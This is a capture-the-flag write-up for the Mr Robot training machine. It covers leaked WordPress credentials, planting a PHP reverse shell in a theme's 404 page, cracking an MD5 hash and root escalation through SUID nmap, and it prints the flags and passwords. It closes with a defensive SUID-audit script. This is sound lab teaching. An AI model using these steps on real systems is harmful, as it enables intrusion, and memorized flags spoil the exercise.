# Mr Robot CTF

## Challenge

[Mr Robot CTF](https://tryhackme.com/r/room/mrrobot)

### Goal

Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?

### Hints

#### key 1

Robots

#### key 2

There's something fishy about this wordlist... Why is it so long?

#### key 3

nmap

## Walkthrough

### Key 1

```
┌──(kali㉿kali)-[~]
└─$ curl http://10.10.238.241/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt

┌──(kali㉿kali)-[~]
└─$ curl http://10.10.238.241/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
```

:::info
robots.txt is an ASCII-encoded text file stored in a website's root directory. It tells search-engine crawlers (also called web spiders) which parts of the site they should not fetch and which parts they may fetch.
:::

There is also a wordlist, `fsocity.dic`, which should come in handy later.

### Key 2

A directory scan turned up a username and password, `elliot:ER28-0652`, in `/license.txt`.

```
┌──(kali㉿kali)-[~]
└─$ curl http://10.10.238.241/license
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
do you want a password or something?
ZWxsaW90OkVSMjgtMDY1Mgo=

┌──(kali㉿kali)-[~]
└─$ echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 --decode
elliot:ER28-0652
```

`/wp-login.php` shows the WordPress admin login page; log in to the admin panel with these credentials.

After logging in, install the [wordpress reverse shell plugin](https://github.com/4m3rr0r/Reverse-Shell-WordPress-Plugin) to obtain a shell.

Next, look for `key-2-of-3.txt`:

```
find / -name key-2-of-3.txt
/home/robot/key-2-of-3.txt
```

The file cannot be read directly here, presumably because of insufficient permissions. Under `/home/robot/` there is another file, `password.raw-md5`; printing it gives robot's password hash, and cracking that hash yields the password `abcdefghijklmnopqrstuvwxyz`.

```
cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
```

After this, for some reason my shell started behaving strangely, so I used a different [reverse shell php](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php) and placed it in the 404 page (WordPress admin -> Appearance -> Editor). That gave me a fresh shell; after switching user to robot, I got key 2.

```
$ su - robot
Password: abcdefghijklmnopqrstuvwxyz
$ whoami
robot
$ cd /home/robot/
$ ls
key-2-of-3.txt  password.raw-md5
$ cat ke*
822c73956184f694993bede3eb39f959
$
```

### Key 3

Looking for a privilege-escalation path, `nmap` turns out to be SUID root, which matches the hint.

```
$ find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
$
```

Then `nmap`'s interactive mode yields key 3:

```
$ nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !cat /root/*.txt
!cat /root/*.txt
04787ddef27c3dee1ee161b21670b4e4
```
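From the defender's side, the SUID listing above is exactly what a host audit should be comparing against a known-good baseline. The following Python script is an added example, not part of the original writeup: it takes that listing (embedded as sample input), reports every SUID-root binary outside an assumed stock Debian/Ubuntu baseline, and singles out those under locally-managed prefixes such as `/usr/local/bin`, where no package manager installs anything.

```python
# Assumed baseline of SUID-root binaries a stock Debian/Ubuntu install ships;
# generate a real one from a known-good host or from package metadata.
EXPECTED_SUID = {
    "/bin/ping", "/bin/ping6", "/bin/mount", "/bin/umount", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/pt_chown",
}

# Package managers do not install into these prefixes, so a SUID-root
# binary found here was placed by hand (as /usr/local/bin/nmap was).
LOCAL_PREFIXES = ("/usr/local/", "/opt/", "/home/", "/tmp/", "/var/tmp/")

# Sample input: the `find / -user root -perm -4000` output from the writeup,
# embedded so the script runs offline; swap in live find output to audit a host.
SAMPLE_LISTING = """\
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
"""

def audit_suid(listing: str):
    """Return (unexpected, local): paths outside the baseline, and the subset
    of those under a locally-managed prefix, the strongest signal to chase."""
    paths = [line.strip() for line in listing.splitlines() if line.strip()]
    unexpected = sorted(p for p in paths if p not in EXPECTED_SUID)
    local = [p for p in unexpected if p.startswith(LOCAL_PREFIXES)]
    return unexpected, local

if __name__ == "__main__":
    unexpected, local = audit_suid(SAMPLE_LISTING)
    for p in unexpected:
        print("LOCAL  " if p in local else "review ", p)
```

On this listing the script flags the two VMware helpers for review and `/usr/local/bin/nmap` as a hand-installed SUID binary; the fix is to drop the SUID bit (`chmod u-s`) or remove the binary, and to run the audit on a schedule so a new entry is noticed.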